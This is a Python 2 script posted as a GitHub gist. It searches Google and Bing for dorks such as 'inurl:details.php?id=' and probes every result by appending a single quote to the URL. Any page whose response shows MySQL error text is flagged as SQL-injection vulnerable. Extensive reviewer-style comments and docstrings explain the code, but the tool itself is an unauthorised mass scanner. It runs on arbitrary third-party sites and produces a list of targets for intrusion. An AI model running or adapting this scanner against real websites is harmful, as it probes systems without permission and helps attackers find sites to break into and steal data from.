
@SiloGit
Forked from mvmthecreator/dorks.py
Created May 2, 2017 14:16
Search Bing and Google for Dorks
"""
***** Auto-finder by dorks tool with Google API & Bing API *****
@author: z0rtecx
@release date: dec-2014
@version: 1.0.12122014
@poc: good dork to find web pages with SQLi vulnerability in ID parameter, e.g. "inurl:details.php?id="
@description: This tool is for save time for you. It is gathering dorks of a txt file, and search potential web pages with SQLi vulnerability. ONLY FOR MySQL errors.
@features:
- Find web pages vuln.
@usage:
- You need a txt file in each line a dork with "inurl:" google command. E.g.
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news_view.php?id=
...
- You need Google Search API library: https://developers.google.com/api-client-library/python/apis/customsearch/v1
- A Google API key: https://www.google.com/cse/manage/all
- A Bing API key: Microsoft Azure Marketplace, search how get it in google :P
@example:
$ python dorktool.py
"""
#!/usr/bin/env python
import urllib
import sys
import json
import re
import time
import MySQLdb
import urllib2
from urllib import quote_plus,unquote_plus
from apiclient.discovery import build
# CONSTANTS
############################################################
# Error messages to find in vulnerable web.
# Substrings that isVulnerable() looks for in the response to the
# quote-appended URL; a word only counts when the unmodified page does
# not already contain it.
ERROR_WORDS = ["Warning", "You have an error in your SQL syntax"]
DORK_OFFSET = 5 # Number of dorks in memory at same time (lines read per loadDorks() call)
DORK_ROUND = 0 # Round of dork finding; loadDorks() increments it and exits the process when it reaches 201
LAST_DORK = 0 # Last dork byte in the file: offset loadDorks() seeks to on its next call
PATRON = re.compile('=[0-9]+') # Regular expression to find in URLs -- not referenced anywhere in this file as shown
# Bing authentication
# NOTE(review): the API secret lives in source. str.encode('base64') is a
# Python 2 codec (its output ends with a newline, which the [:-1] strips)
# and does not exist for Python 3 str. A real key committed here is
# readable by anyone with access to the gist; load it from the environment
# at run time instead.
key = 'YOUR_BING_KEY'
credentials = (':%s' % key).encode('base64')[:-1]
auth = 'Basic %s' % credentials # HTTP Basic header value that bingSearch() sends
# Google auth
GOOGLE_KEY = "YOUR_GOOGLE_KEY" # passed as developerKey to build() in googleSearch()
# Google custom search engine
GOOGLE_CX = "YOUR_GOOGLE_CX" # custom search engine id, passed as cx in googleSearch()
############################################################
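# Returns the body of the http response from the indicated url ('' on failure)
def request(url):
    """Fetch *url* with a plain GET and return the response body.

    Any failure (network error, HTTP error status, malformed URL) is
    swallowed and an empty string is returned, so callers cannot tell a
    failed fetch from an empty page. Only ``Exception`` subclasses are
    caught: the previous bare ``except:`` also absorbed ``KeyboardInterrupt``
    and ``SystemExit``, which made the calling loop hard to stop.

    Args:
        url: absolute URL to request.

    Returns:
        The response body, or '' when the request could not be completed.
    """
    try:
        resp = urllib2.urlopen(urllib2.Request(url))
    except Exception:
        return ''
    try:
        return resp.read()
    except Exception:
        return ''
    finally:
        # Release the socket explicitly; the original relied on garbage
        # collection to close the response object.
        resp.close()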
# Returns True if a url can be vulnerable to SQLi. False in other case.
def isVulnerable(url):
    """Heuristic: does appending a single quote to *url* change the page
    and surface one of the ERROR_WORDS strings?

    Both fetches go through request(), which returns '' on any failure,
    so two failed fetches compare equal and the answer is False. A word
    counts only when it appears in the probed response and is absent from
    the unmodified one. The result is a hint, not a confirmed finding.

    Args:
        url: the page URL to compare against its quote-appended variant.

    Returns:
        bool
    """
    baseline = request(url)
    probed = request(url + "'")
    if baseline == probed:
        return False
    return any(
        word in probed and word not in baseline
        for word in ERROR_WORDS
    )
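# Load DORK_OFFSET dorks in memory from the given file.
# Each call resumes where the previous one stopped and
# returns the next batch.
def loadDorks(filename):
    """Return the next DORK_OFFSET lines of *filename* as a list of dorks.

    Reading resumes at the byte offset stored in the global LAST_DORK,
    which is updated before returning. The global DORK_ROUND counts the
    calls made so far; when it reaches 201 the process exits.

    Args:
        filename: path of a text file with one dork per line.

    Returns:
        list[str] with exactly DORK_OFFSET entries. Past the end of the
        file readline() yields '' and the entry is an empty string (the
        end of the file is not detected here).

    Raises:
        The open() error if the file cannot be read; SystemExit after
        round 201.
    """
    global DORK_ROUND  # both globals are mutated below
    global LAST_DORK
    print('Loading dorks... ' + str(DORK_ROUND))
    dorks = []
    # The with-block closes the file even if seek()/readline() raise.
    with open(filename) as f:
        f.seek(LAST_DORK)
        for _ in range(DORK_OFFSET):
            line = f.readline()
            # Strip only the line terminator. The previous unconditional
            # [:-1] also removed the last character of a final line that
            # has no trailing newline.
            if line.endswith('\n'):
                line = line[:-1]
            dorks.append(line)
        LAST_DORK = f.tell()
    DORK_ROUND += 1
    if DORK_ROUND == 201:
        print("Dorks finished.")
        sys.exit()
    return dorks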
# Return a dict of URLs, result of Google Dorks search
# Each value of the dict is a dictionary which includes:
# url
# name of page
# if vulnerable to SQLi
def googleSearch(dork):
    """Query the Google Custom Search API for *dork* and return a dict.

    Keys are the ``displayLink`` of each hit; values are dicts with 'url',
    'nombre', 'vuln' ('' or "[*]" when isVulnerable() returned True),
    'buscador' ('Google') and 'fecha_indexacion' (today's date).

    Every error -- API failure, quota exhaustion, a response without an
    'items' key -- is caught by a bare ``except:`` and the partial results
    gathered so far are returned. Nothing is logged, so an API error is
    indistinguishable from an empty result set.

    NOTE(review): indentation was lost in this paste. The layout below
    places ``rango += 1`` after the per-item loop and the "Next Dork"
    print at the end of each page iteration; confirm against the original.
    """
    results = {}
    try:
        # developerKey is the module-level API key.
        service = build("customsearch", "v1", developerKey=GOOGLE_KEY)
        rango = 1
        # At most five requests per dork; 'start' is advanced by one per request.
        for i in range(1, 6):
            try:
                res = service.cse().list(q=dork, cx=GOOGLE_CX, start=rango, filter='1').execute()
                # The inner loop rebinds ``i``; harmless, since the outer
                # range() iteration does not read it.
                for i in res[u'items']:
                    dic = {
                        'url': i[u'link'],
                        'nombre': i[u'displayLink'],
                        'vuln': '',
                        'buscador': 'Google',
                        'fecha_indexacion': time.strftime("%Y-%m-%d"),
                    }
                    # If vulnerable
                    if isVulnerable(dic['url']):
                        dic['vuln'] = "[*]"
                    # Keyed by 'nombre': a later hit with the same
                    # displayLink overwrites an earlier one.
                    results[dic['nombre']] = dic
                rango += 1
            except:
                # Bare except: also swallows KeyboardInterrupt / SystemExit.
                return results
            print "Next Dork\n"
    except:
        return results
    return results
# Return a dict of URLs found using Bing Dorks
def bingSearch(dork):
    """Query the Bing Search API (Azure datamarket endpoint) for *dork*.

    Returns a dict keyed by the host name extracted from each hit; each
    value holds 'url', 'nombre', 'vuln' ("[*]"), 'buscador' ('Bing') and
    'fecha_indexacion' (today's date). Unlike googleSearch(), only hits
    for which isVulnerable() returned True are kept. No error is caught
    here: a network failure, a non-JSON body or a missing 'd'/'results'
    key propagates to the caller. The Authorization header value comes
    from the module-level ``auth`` string.

    Args:
        dork: search expression, URL-encoded with quote_plus().

    Returns:
        dict[str, dict]
    """
    endpoint = (
        'https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=%27'
        + quote_plus(dork)
        + '%27&$format=json'
    )
    api_request = urllib2.Request(endpoint)
    api_request.add_header('Authorization', auth)
    response = urllib2.build_opener().open(api_request)
    payload = json.loads(response.read())
    entries = payload['d']['results']
    results = {}
    for entry in entries:
        page_url = 'http://' + str(entry['DisplayUrl'].encode('ascii', 'ignore'))
        # Group 3 of the first match is the host part of the URL.
        host_match = re.findall(
            "((http\://|https\://|ftp\://)|(www.))+(([a-zA-Z0-9\.-]+\.[a-zA-Z]{2,4})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(/[a-zA-Z0-9%:/-_\?\.'~]*)?",
            page_url,
        )
        record = {
            'url': page_url,
            'nombre': host_match[0][3],
            'vuln': '',
            'buscador': 'Bing',
            'fecha_indexacion': time.strftime("%Y-%m-%d"),
        }
        if not isVulnerable(page_url):
            continue
        record['vuln'] = '[*]'
        results[record['nombre']] = record
    return results
# Format the URLs for the screen output
def printResults(dork, results):
    """Print one block per entry of *results*.

    Each block shows a running counter "[i/total from <dork>]" followed by
    the record's 'nombre', 'url', 'vuln', 'buscador' and 'fecha_indexacion'
    fields. stdout is flushed once the loop is done.

    Args:
        dork: the search expression the results came from.
        results: dict mapping a name to a result record dict.
    """
    total = len(results)
    for position, (_, fields) in enumerate(results.items(), 1):
        print('\n------------------------------------')
        print('[%d/%d from %s]' % (position, total, dork))
        print('WEB NAME: %s' % fields['nombre'])
        print('URL: %s' % fields['url'])
        print('VULN: %s' % fields['vuln'])
        print('SEARCH ENGINE: %s' % fields['buscador'])
        print('DATE: %s' % fields['fecha_indexacion'])
        print('------------------------------------')
    sys.stdout.flush()
###############
# MAIN FUNCTION
###############
if __name__ == "__main__":
    # Driver loop. It ends only when loadDorks() calls sys.exit() after
    # its 201st round, or when an exception escapes (bingSearch() catches
    # none).
    while True:
        dorks = loadDorks('dorks.txt')  # next DORK_OFFSET dorks from the file
        for d in dorks:
            # Query both engines for this dork, then report each result set;
            # an empty dict means the engine returned nothing usable.
            google = googleSearch(d)
            bing = bingSearch(d)
            if google:
                printResults(d, google)
            else:
                print("No Google results found.")
            if bing:
                printResults(d, bing)
            else:
                print("No Bing results found.")